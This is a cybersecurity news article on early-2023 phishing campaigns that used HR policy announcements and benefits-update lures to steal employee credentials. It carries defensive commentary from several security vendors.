Abnormal Security reported stopping multiple campaigns using HR policy announcements and benefits updates to steal credentials. (Photo by Carsten Koall/Getty Images)

Researchers on Thursday reported on multiple campaigns they have stopped in which threat actors used HR policy announcements and benefits updates to start off 2023 to lure victims and steal employees credentials.

In a blog post, Abnormal Security’s Intelligence group said just like the threat actors use the holidays or notable global events to add relevant content to their attacks, they have shifted to beginning-of-the-year policy changes at corporations.

While the timing of these campaigns is notable as we’ve transitioned into the new year, the attacks also leverage a combination of tactics that are likely more effective in getting results, said Crane Hassold, director of threat intelligence at Abnormal Security.

Hassold said by using text related to updated medical benefits and new policies, targeted employees are more likely to take an interest, as they will want to know about any changes that may affect them or their families.

“The most successful attacks incorporate themes that make a target feel personally impacted by the message,” said Hassold. “These attacks also use direct and specific requests for the employee to complete. Instead of merely mentioning that employee benefits have been updated, both of these attacks specifically ask recipients to review a document and electronically sign to acknowledge they’ve seen the updates. At the end of the day, because of sophisticated social engineering threats like these, it’s more important to prevent an attack from reaching a potentially vulnerable end user rather than relying on a user to recognize the threat themselves.”

Jeremy Fuchs, cybersecurity researcher/analyst at Avanan, a Check Point Software Company, added that hackers are always looking to take advantage of timely trends, whether it's benefits notice at the beginning of the year or something else. Fuchs said hackers are looking to take advantage of what employees are looking for, increasing the likelihood of engagement.

“A key here is understanding the content and context of the email to help block it, as well as fully analyzing the .HTM attachment or any links before delivery and at time of click,” said Fuchs. “Similarly, these attacks would gain Microsoft credentials, meaning that hackers would have access to the full Office suite. That's why it's critical to protect all SaaS apps where communication is done, like Teams and OneDrive, so that your organization has 360-degree protection."

Patrick Harr, chief executive officer at SlashNext, said the creativity of attackers is impressive and continuously changing to execute successful attacks. Harr said malicious HTML attacks are often the means to perpetrate these types of social engineering attacks because they often are missed by many security defenses.

“That’s why it’s important to have security defenses that can interrogate a file for social engineering intent and malicious code,” Harr said. “That way, when attackers get creative, it doesn’t matter, your defenses will identify and stop them before your users become victims.”